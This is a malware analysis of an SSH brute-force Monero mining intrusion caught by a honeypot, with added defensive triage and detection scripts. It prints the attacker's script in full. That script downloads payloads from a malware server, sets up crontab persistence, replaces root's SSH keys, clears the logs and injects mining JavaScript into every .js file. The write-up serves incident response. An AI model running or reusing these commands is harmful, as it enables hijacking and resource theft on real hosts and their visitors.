Preface
Digital currency has gradually become a focus of public attention because of its decentralised technology and its economic value. At the same time it is an important source of profit for the black and grey industries, which obtain it through malicious mining. This article analyses an XMR (Monero) malicious mining incident captured by a honeypot: the attacker gains access by brute-forcing SSH, configures password-less SSH login for root, and downloads and runs both an XMR mining program and an XMR web-page mining script. The ELF mining program consumes the CPU/GPU of the compromised host (the bot), while the web-page mining script consumes the resources of every client that loads a JavaScript file served by that host.
I. Obtain permissions
1) Brute-force SSH
On October 11, 2018 an attacker at 223.89.72.8 brute-forced the honeypot's SSH service and obtained root privileges.
2) Disable the victim's firewall
Logged in as the brute-forced account, the attacker changes to the working directory /tmp and tries to stop the host firewall. The commands cover both Red Hat style iptables service control and SUSE's SuSEfirewall2, so that one of them works whatever the distribution:
root@victim:~# cd /tmp
root@victim:~# /etc/init.d/iptables stop
root@victim:~# service iptables stop
root@victim:~# SuSEfirewall2 stop
root@victim:~# reSuSEfirewall2 stop
3) Download the malicious script
The attacker then has the victim download the malicious file shz.sh from the malware server 140.143.35.89:43768:
root@victim:/tmp# wget http://140.143.35.89:43768/shz.sh
--2018-10-11 19:07:34--  http://140.143.35.89:43768/shz.sh
Connecting to 140.143.35.89:43768... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7470 (7.3K) [application/octet-stream]
Saving to: `/tmp/shz.sh'

 58% [======================>               ] 4,380       41K/s  eta 0s
100% [======================================>] 7,470       41K/s
2018-10-** **:**:** (41 KB/s) - `/tmp/shz.sh' saved [7470/7470]
II. Execute the malicious script
With access to the victim and shz.sh downloaded, the attacker runs /tmp/shz.sh. Its malicious behaviour is described below.
1) Start execution
root@victim:/tmp# sh shz.sh &
2) Basic configuration
The script reads the current user's crontab and root's authorized_keys (so that it can later check what it has already added), defines its variables, and renames the download tools. Renaming wget and curl hinders competing malware and casual operators; for a defender, a missing /usr/bin/wget next to a /usr/bin/get is a strong indicator of this script:
#!/bin/sh
# crontab scheduled task (crontab -e)
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
# SSH login public key
ssht=`cat /root/.ssh/authorized_keys`
# custom variables; /etc/gmbpr is a marker file whose creation proves write access to /etc
echo 1 > /etc/gmbpr
rtdir="/etc/gmbpr"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/url"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/get"
# rename the download commands; the script itself falls back to url/get when curl/wget are gone
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url
3) Determine account permissions (privileged)
If the file /etc/gmbpr exists, the brute-forced account can write to /etc, which in practice means root. The working directory is then /etc:
if [ -f "$rtdir" ]
3.1 Scheduled task + password-less login
# add /etc/shz.sh to the crontab unless it is already there; "* * * * *" runs it every minute
[[ $cont =~ "shz.sh" ]] || echo "* * * * * sh /etc/shz.sh > /dev/null 2>&1" > ${crondir}
# add the attacker's public key to authorized_keys for password-less SSH login
# (the redirection is ">", not ">>": any keys already in root's authorized_keys are overwritten)
[[ $ssht =~ "Xvsrtqhlmwoh" ]] || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/zkbe2ijeamhqlezpe4vprfiPaygo8cf8tn9dcpqxh9iv5/vyebadxevixktvsjpwny/assets/xpzen4ggl+kN+7ggxvsrtqhAuthorization+1dzd36a8ijjcjarutyjnrzdkp8t3hiew0ubadhiu3+ku641kw9bfr9kg7vzgrvrf7lvzon6o8ybq [email protected]_me" > /root/.ssh/authorized_keys
The key body is reproduced as it appears in this copy of the analysis; its letter case and several fragments were damaged in transcription, so only the intact prefix (AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc) is a reliable string to search for in authorized_keys.
3.2 Configuration file for malicious mining
If the configuration file /etc/com.json does not exist, download it from http://140.143.35.89:43768/com.json to /etc/com.json with whichever download tool is present (curl, the renamed url, or wget). The --retry 100 / --tries=100 options make the download persistent:
cfg="/etc/com.json"
if [ -f "$cfg" ]
then
    echo "exists config"
else
    if [ -f "$bbdir" ]
    then
        curl --connect-timeout 10 --retry 100 http://140.143.35.89:43768/com.json > /etc/com.json
    elif [ -f "$bbdira" ]
    then
        url --connect-timeout 10 --retry 100 http://140.143.35.89:43768/com.json > /etc/com.json
    elif [ -f "$ccdir" ]
    then
        wget --timeout=10 --tries=100 -P /etc http://140.143.35.89:43768/com.json
    fi
fi
3.3 ELF main mining program
Download the main mining program zjgw from http://zjgw-1256891197.cos.ap-beijing.myqcloud.com (Tencent Cloud COS object storage) to /etc. zjgw is an ELF binary. Note that the wget branch fetches it through the short link http://dwz.cn/hqCK3WKx rather than from the COS URL directly:
if [ -f "$bbdir" ]
then
    curl --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zjgw > /etc/zjgw
elif [ -f "$bbdira" ]
then
    url --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zjgw > /etc/zjgw
elif [ -f "$ccdir" ]
then
    wget --timeout=10 --tries=100 -P /etc http://dwz.cn/hqCK3WKx
fi
3.4 Run the malicious mining program
Run zjgw with the configuration file com.json. The assignment of ${IP} is not shown in the excerpt:
chmod 777 zjgw
# replace the placeholder "unknow" in com.json with ${IP}; "unknow" is the worker suffix of the
# wallet address in com.json (see section III), so each bot reports to the pool under its own IP
sed -i "s/unknow/${IP}/g" com.json
sleep 5s
# start the miner
./zjgw --config=com.json
# clear the command history
history -c
echo > /root/.bash_history
3.5 Download and run the shz.sh script file
If /etc/shz.sh does not already exist, download it from the malware server and run it, so that the copy in /etc (the one the crontab entry calls) exists independently of the original in /tmp:
shdir='/etc/shz.sh'
if [ -f "$shdir" ]
then
    echo "exists shell"
else
    # fetched with curl or wget, chosen by the same $bbdir/$ccdir checks as above
    curl --connect-timeout 10 --retry 100 http://140.143.35.89:43768/shz.sh > /etc/shz.sh
    wget --timeout=10 --tries=100 -P /etc http://140.143.35.89:43768/shz.sh
    sh /etc/shz.sh
fi
4) Determine account permissions (unprivileged)
If /etc/gmbpr does not exist, the brute-forced account is an ordinary user. The script repeats the same steps with /tmp as the working directory and adds the start-up script to that user's own crontab:
4.1) download the configuration file com.json to /tmp
4.2) download the main mining program zjgw to /tmp
4.3) run the mining program with the configuration file (same as 3.4)
4.4) download and run the malicious script /tmp/shz.sh (same as 3.5)
5) Monero JavaScript web mining
The script searches the whole filesystem for .js files and appends to each one a document.write() that loads the web-mining script and starts it with the attacker's site key. Any page served from the host that includes one of these files therefore mines on the visitor's CPU:
document.write('<script src="http://t.cn/EvlonFh"></script><script>OMINEId("e02cf4ce91284dab9bc3fc4cc2a65e28","-1")</script>');
# grep -L lists only the files that do not yet contain "f4ce9" (a fragment of the site key), so each
# file is injected once; sed's "$a\" appends the line after the last line of the file
find / -name '*.js' | xargs grep -L f4ce9 | xargs sed -i '$a\document.write\('\'\<script\ src=\"http://t.cn/EvlonFh\"\>\</script\>\<script\>OMINEId\(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\"\)\</script\>\'\)\;
6) Clear traces
Finally the script empties the root mailbox and the login and authentication logs:
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
Because the files are truncated rather than deleted, a wtmp or secure file of one byte (a single newline) with a modification time at the intrusion is itself a useful indicator; the brute-force attempts and the successful login remain recoverable from any remote syslog or audit copy of the log.
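The following host triage script is an added example and is not part of the original analysis. It collects in one place the indicators left by sections 2) to 6): the dropped files in /etc and /tmp, wget and curl renamed to get and url, crontab entries calling shz.sh, the attacker's key in root's authorized_keys, logs truncated to a single newline, and .js files carrying the OMINEId loader. It takes a filesystem prefix so it can run against a mounted image or, as in make_sample_tree, a constructed sample tree; pass / on a live host. File paths containing spaces are not handled.

```bash
#!/bin/bash
# Added example: triage a host for the shz.sh / zjgw artefacts described above.
# ROOT is a path prefix ("/" for a live host); make_sample_tree builds a constructed
# tree that mirrors the script's effects so the checks can be exercised offline.

triage() {                      # usage: triage ROOT ; prints one finding per line, ends with "TOTAL n"
    root="${1%/}"; n=0
    # 1. files dropped by the root (/etc) and non-root (/tmp) code paths
    for f in /etc/gmbpr /etc/zjgw /etc/com.json /etc/shz.sh \
             /tmp/zjgw /tmp/com.json /tmp/shz.sh; do
        [ -e "$root$f" ] && { echo "FILE    $f"; n=$((n+1)); }
    done
    # 2. wget/curl renamed to get/url by the script's "mv" lines
    for pair in wget:get curl:url; do
        orig=${pair%%:*}; new=${pair##*:}
        if [ ! -e "$root/usr/bin/$orig" ] && [ -e "$root/usr/bin/$new" ]; then
            echo "RENAMED /usr/bin/$orig -> /usr/bin/$new"; n=$((n+1))
        fi
    done
    # 3. crontab entries that run shz.sh (Red Hat and Debian spool layouts)
    for c in "$root"/var/spool/cron/* "$root"/var/spool/cron/crontabs/*; do
        [ -f "$c" ] && grep -q 'shz\.sh' "$c" && { echo "CRON    ${c#$root}"; n=$((n+1)); }
    done
    # 4. the attacker's key: match on the intact prefix of the key quoted in the script
    ak="$root/root/.ssh/authorized_keys"
    if [ -f "$ak" ] && grep -q 'AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc' "$ak"; then
        echo "SSHKEY  /root/.ssh/authorized_keys"; n=$((n+1))
    fi
    # 5. "echo > file" leaves the log present but holding a single newline (0 or 1 byte)
    for l in /var/log/wtmp /var/log/secure /var/spool/mail/root /root/.bash_history; do
        [ -f "$root$l" ] && [ "$(wc -c < "$root$l" | tr -d ' ')" -le 1 ] && { echo "TRUNC   $l"; n=$((n+1)); }
    done
    # 6. .js files carrying the injected web-mining loader
    hits=$(find "${root:-/}" -name '*.js' -type f -exec grep -l 'OMINEId(' {} + 2>/dev/null || true)
    for js in $hits; do echo "JSMINER ${js#$root}"; n=$((n+1)); done
    echo "TOTAL $n"
}

remove_js_miner() {             # usage: remove_js_miner FILE ; strips the appended document.write line
    grep -v 'OMINEId(' "$1" > "$1.clean" || true
    mv "$1.clean" "$1"
}

make_sample_tree() {            # usage: make_sample_tree DIR ; constructed sample, not a real image
    d="$1"
    mkdir -p "$d/etc" "$d/tmp" "$d/usr/bin" "$d/var/spool/cron" "$d/root/.ssh" "$d/var/log" "$d/var/www"
    echo 1 > "$d/etc/gmbpr"; : > "$d/etc/zjgw"; : > "$d/etc/com.json"; : > "$d/etc/shz.sh"
    : > "$d/usr/bin/get"; : > "$d/usr/bin/url"          # wget and curl are absent, as after the mv
    echo '* * * * * sh /etc/shz.sh >/dev/null 2>&1' > "$d/var/spool/cron/root"
    echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc... attacker' > "$d/root/.ssh/authorized_keys"
    echo > "$d/var/log/wtmp"; echo > "$d/var/log/secure"   # truncated exactly as the script does it
    echo 'var app = 1;' > "$d/var/www/clean.js"
    printf '%s\n%s\n' 'var app = 1;' \
        "document.write('<script src=\"http://t.cn/EvlonFh\"></script><script>OMINEId(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\")</script>');" \
        > "$d/var/www/app.js"
}

# Stand-alone demonstration against the constructed tree; on a live host run: triage /
demo=$(mktemp -d)
make_sample_tree "$demo"
triage "$demo"
rm -rf "$demo"
```

Every finding is reported with its original path so the output can be pasted into a ticket; remove_js_miner is deliberately limited to the injected line and leaves the rest of each file untouched.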
III. Execute the ELF mining program
1) Mining configuration file com.json
The configuration file gives the XMR mining algorithm, the pool address and the wallet address. The field names (algo, av, donate-level, max-cpu-usage, pools) are those of the XMRig miner's JSON configuration, and the values are chosen for a bot: "background" daemonises the process, API port 0 disables the local HTTP API, and "max-cpu-usage" 90 with "cpu-priority" 5 (the highest level) takes nearly the whole CPU:
{
    # Monero's proof-of-work at the time: the CryptoNight family ("variant": -1 selects the variant automatically)
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-priority": 5,
    "donate-level": 1,
    "log-file": null,
    "max-cpu-usage": 90,
    "pools": [
        {
            # pool address
            "url": "stratum+tcp://xmr.f2pool.com:13531",
            # wallet address; the ".unknow" suffix is the worker name that shz.sh replaces with ${IP}
            "user":
            "46j2hc8eJbZZST8L4cpmLdjKKvWnggQVt9HRLYHsCKHUZbuok15X93ag9djxnt2mdpdJPRCsvuHzm92iahdpBxZa3FbBovX.unknow",
            "pass": "x",
            "keepalive": true,
            "nicehash": false,
            "variant": -1
        }
    ],
    "print-time": 60,
    "retries": 99999,
    "retry-pause": 5,
    "safe": false,
    "syslog": false
}
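The script below is an added example, not code from the original analysis, showing how to pull the pool endpoint, wallet and worker name out of a com.json without jq (the value of "user" may sit on its own line, as above, so the file is flattened first), how the sed step from section 3.4 turns the ".unknow" suffix into the bot's IP address, and how to look for live sessions to the pool port. The sample configuration is constructed to mirror the one shown above.

```bash
#!/bin/bash
# Added example: fingerprint an XMRig-style config such as com.json and check for pool traffic.

json_string() {                 # usage: json_string FILE KEY ; first string value of "KEY", newline-tolerant
    tr -d '\n' < "$1" | grep -o "\"$2\" *: *\"[^\"]*\"" | head -n 1 | sed 's/^[^:]*: *"//; s/"$//'
}

pool_endpoint() {               # usage: pool_endpoint FILE ; prints "host port"
    u=$(json_string "$1" url)
    hp=${u#*://}                # drop the stratum+tcp:// scheme
    echo "${hp%:*} ${hp##*:}"
}

wallet_address() {              # usage: wallet_address FILE ; the part of "user" before the first dot
    u=$(json_string "$1" user); echo "${u%%.*}"
}

worker_name() {                 # usage: worker_name FILE ; the pool shows each bot under this name
    u=$(json_string "$1" user)
    case "$u" in *.*) echo "${u#*.}" ;; *) echo "" ;; esac
}

name_worker_as_ip() {           # usage: name_worker_as_ip FILE IP ; what shz.sh does with sed -i "s/unknow/${IP}/g"
    sed "s/unknow/$2/g" "$1" > "$1.tmp" && mv "$1.tmp" "$1"
}

live_pool_connections() {       # usage: live_pool_connections PORT ; established TCP sessions to the pool port
    command -v ss >/dev/null 2>&1 || { echo "ss not available" >&2; return 0; }
    ss -tnp state established "( dport = :$1 )" 2>/dev/null | tail -n +2
}

write_sample_config() {         # constructed sample mirroring com.json above (comments removed, it is real JSON)
    cat > "$1" <<'EOF'
{
    "algo": "cryptonight",
    "background": true,
    "max-cpu-usage": 90,
    "pools": [
        {
            "url": "stratum+tcp://xmr.f2pool.com:13531",
            "user":
            "46j2hc8eJbZZST8L4cpmLdjKKvWnggQVt9HRLYHsCKHUZbuok15X93ag9djxnt2mdpdJPRCsvuHzm92iahdpBxZa3FbBovX.unknow",
            "pass": "x"
        }
    ]
}
EOF
}

# Stand-alone demonstration; on a suspect host point the functions at /etc/com.json or /tmp/com.json
cfg=$(mktemp)
write_sample_config "$cfg"
echo "pool:          $(pool_endpoint "$cfg")"
echo "wallet:        $(wallet_address "$cfg")"
echo "worker before: $(worker_name "$cfg")"
name_worker_as_ip "$cfg" 10.0.0.5
echo "worker after:  $(worker_name "$cfg")"
set -- $(pool_endpoint "$cfg")
live_pool_connections "$2"
rm -f "$cfg"
```

Since the worker name becomes the bot's IP, the pool's per-wallet worker list is effectively a list of victims, which is why the per-wallet miner counts in the next section are meaningful.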
2) The main mining program zjgw
zjgw is a 64-bit ELF binary; VirusTotal engines flag it as a miner.
At the time of writing the attacker uses f2pool for the ELF miner, and the pool's statistics for the wallet address above show:
(1) 164 miners online;
(2) 254 miners in total;
(3) a total payout of 4.7 XMR to this wallet, about 3459 RMB at the then price of 736 RMB per XMR;
(4) many of these miners are probably bots captured by the attacker, who may also be earning through other wallet addresses and other bot miners.
IV. Monero JavaScript web mining
1) The short URL http://t.cn/EvlonFh redirects to https://xmr.omine.org/assets/v7.js:
HTTP/1.1 302 Found
Date: Mon, 15 Oct 2018 08:02:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 216
Connection: keep-alive
Set-Cookie: aliyungf_tc=AQAAAN65sGSyOQcAihDut35iYAxQi2Sj; Path=/; HttpOnly
Server: nginx
Location: https://xmr.omine.org/assets/v7.js
2) curl https://xmr.omine.org/assets/v7.js
This JavaScript file contains the mining pool address wss://xmr.omine.org:8181, so every browser that loads an injected page opens a WebSocket to that pool and mines under the site key passed to OMINEId.
Assuming the JS web mining and the ELF mining pay into the same wallet, the web-mining income is comparatively small: 0.037 XMR.
After obtaining a system account by SSH brute force, the attacker on the one hand downloads and runs the ELF mining binary, using the host's CPU/GPU to mine XMR (Monero), and on the other hand inserts web-mining code into the host's JavaScript files, so that the browsers of clients loading those pages mine XMR as well. Recommended measures:
(1) Account hardening: disable SSH password authentication (or at least password login for root) in favour of keys, and audit /root/.ssh/authorized_keys and the crontabs for entries you did not add;
(2) Monitor system resources, the network and processes: sustained high CPU from an unfamiliar process, outbound connections to stratum ports such as 13531 or to WebSocket port 8181, and crontab entries that run a script every minute;
(3) Check the system for malicious resource abuse (the ELF mining program): /etc/gmbpr, /etc/zjgw, /etc/com.json and /etc/shz.sh, their counterparts in /tmp, and /usr/bin/wget and /usr/bin/curl renamed to get and url;
(4) Check the system for the web-mining script: .js files containing OMINEId or http://t.cn/EvlonFh, and /var/log/wtmp, /var/log/secure and /var/spool/mail/root truncated to a single newline;
(5) Others: block the malware server 140.143.35.89:43768 and the scanning source 223.89.72.8 at the perimeter.
Reference: http://3g.163.com/dy/article/DUIH9G5O05119F6V.html
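As an added example for measures (1) and (2), not part of the original article, the script below counts failed SSH password attempts per source address in an auth log, reports the password logins that followed a burst of failures (the event that opened this intrusion), and checks whether sshd still accepts passwords. The log lines are constructed in the format OpenSSH writes to /var/log/secure or /var/log/auth.log, using the attacker address 223.89.72.8 from this analysis; the hostname "honeypot" and the other address are made up.

```bash
#!/bin/bash
# Added example: SSH brute-force detection over auth log lines, plus an sshd_config check.

failed_logins_by_ip() {         # usage: failed_logins_by_ip LOGFILE ; prints "count ip", busiest source first
    awk '/sshd\[[0-9]+\]: Failed password for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") c[$(i+1)]++
         }
         END { for (ip in c) print c[ip], ip }' "$1" | sort -rn
}

brute_force_sources() {         # usage: brute_force_sources LOGFILE THRESHOLD ; sources with >= THRESHOLD failures
    failed_logins_by_ip "$1" | awk -v t="$2" '$1 >= t { print $2 }'
}

successful_after_brute_force() { # usage: successful_after_brute_force LOGFILE THRESHOLD
    for ip in $(brute_force_sources "$1" "$2"); do
        ip_re=$(printf '%s' "$ip" | sed 's/\./\\./g')   # escape dots so 223.89.72.8 does not match 223x89...
        grep "sshd\[[0-9]*\]: Accepted password for .* from $ip_re " "$1" || true
    done
}

sshd_accepts_passwords() {      # usage: sshd_accepts_passwords SSHD_CONFIG ; prints yes or no
    # sshd's default is yes, and for each keyword the first uncommented value wins (Match blocks not handled)
    v=$(grep -Ei '^[[:space:]]*PasswordAuthentication[[:space:]]+' "$1" | head -n 1 | awk '{print tolower($2)}')
    if [ "$v" = "no" ]; then echo no; else echo yes; fi
}

write_sample_log() {            # constructed sample log lines
    cat > "$1" <<'EOF'
Oct 11 19:01:02 honeypot sshd[2101]: Failed password for root from 223.89.72.8 port 51234 ssh2
Oct 11 19:01:05 honeypot sshd[2103]: Failed password for root from 223.89.72.8 port 51240 ssh2
Oct 11 19:01:07 honeypot sshd[2105]: Failed password for invalid user admin from 223.89.72.8 port 51244 ssh2
Oct 11 19:01:09 honeypot sshd[2107]: Failed password for root from 223.89.72.8 port 51250 ssh2
Oct 11 19:01:12 honeypot sshd[2109]: Failed password for root from 223.89.72.8 port 51255 ssh2
Oct 11 19:01:15 honeypot sshd[2111]: Accepted password for root from 223.89.72.8 port 51260 ssh2
Oct 11 19:02:30 honeypot sshd[2120]: Failed password for alice from 10.0.0.9 port 40001 ssh2
Oct 11 19:02:35 honeypot sshd[2122]: Accepted publickey for alice from 10.0.0.9 port 40002 ssh2
EOF
}

# Stand-alone demonstration; on a real host pass /var/log/secure or /var/log/auth.log instead
log=$(mktemp)
write_sample_log "$log"
echo "failures by source:"
failed_logins_by_ip "$log"
echo "password logins from sources with >= 5 failures:"
successful_after_brute_force "$log" 5
if [ -r /etc/ssh/sshd_config ]; then
    echo "sshd accepts passwords: $(sshd_accepts_passwords /etc/ssh/sshd_config)"
fi
rm -f "$log"
```

The threshold is a parameter because a single failure from an administrator's typo must not page anyone; what should page is a password acceptance from a source that had already failed many times, which is exactly the pattern the honeypot recorded for 223.89.72.8.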
Analysis of XMR malicious mining cases